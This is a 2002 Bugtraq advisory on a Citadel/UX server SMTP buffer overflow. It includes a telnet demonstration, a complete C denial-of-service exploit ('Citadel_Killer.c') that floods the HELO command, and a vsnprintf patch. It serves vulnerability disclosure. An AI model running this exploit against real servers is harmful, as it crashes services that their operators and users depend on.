[24611] in bugtraq
Citadel/UX Server Remote DoS attack Vulnerability
daemon@ATHENA.MIT.EDU (xperc)
Mon Mar 11 14:31:14 2002
Date: 9 Mar 2002 23:10:15 -0000
Message-ID: <20020309231015.12129.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: xperc <xperc@hotmail.com>
To: bugtraq@securityfocus.com
What is Citadel/UX:
Citadel/UX is an advanced client/server BBS program
for operating highly interactive sites, both on the
Internet and over dialup. Users can connect to
Citadel/UX using any of telnet, WWW, or client
software. Among the features supported are public
and private message bases (rooms), electronic mail,
real-time chat, paging, etc. The server is
multithreaded and can easily support a large number
of concurrent users. In addition, SMTP and POP3
servers are built-in for easy connection to Internet
mail. Citadel/UX is both robust and mature, having
been developed over the course of the past twelve
years.
Problem:
I has found a buffer overflow in the Citadel/UX server.
an attacker can execute a denial of service attack
against it. Once the big buffer has been sent, the
server is vulnerable.
Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]
[buffer] is around 4096 characters.
/* Citadel_Killer.c
*
* Remote Denial of Service Citadel/UX Server.
*
* by xperc@hotmail.com
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define MAXBUF 8000
#define MAXBUF2 MAXBUF+6
#define RECVBUF 256
#define CIT_SMTP 25
int main(int argc, char *argv[])
{
int sockfd;
char msg[RECVBUF],buf[MAXBUF],sendbuf
[MAXBUF2];
struct sockaddr_in target;
if(argc!=2){
fprintf(stderr,"Usage: %s
target_address\n",*argv);
exit(-1);
}
if((sockfd=socket
(AF_INET,SOCK_STREAM,0))<0){
perror("socket");
exit(-1);
}
target.sin_family=AF_INET;
target.sin_port=htons(CIT_SMTP);
target.sin_addr.s_addr=inet_addr(argv[1]);
if(connect(sockfd,(struct sockaddr*)
&target,sizeof(target))<0){
perror("connect");
exit(-1);
}
if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
perror("recv");
exit(-1);
}
memset(buf,'a',MAXBUF);
snprintf(sendbuf,sizeof(sendbuf),"helo %
s",buf);
strcat(sendbuf,"\n");
send(sockfd,sendbuf,strlen(sendbuf),0);
close(sockfd);
return 0;
}
Patch for this Vulnerability:
--- citadel-old/sysdep.c Sat Dec 8 12:31:44
2001
+++ citadel/sysdep.c Sat Mar 9 05:51:11
2002
@@ -106,7 +106,7 @@
char buf[4096];
va_start(arg_ptr, format);
- vsprintf(buf, format, arg_ptr);
+ vsnprintf(buf, sizeof(buf), format, arg_ptr);
va_end(arg_ptr);
if (loglevel <= verbosity) {
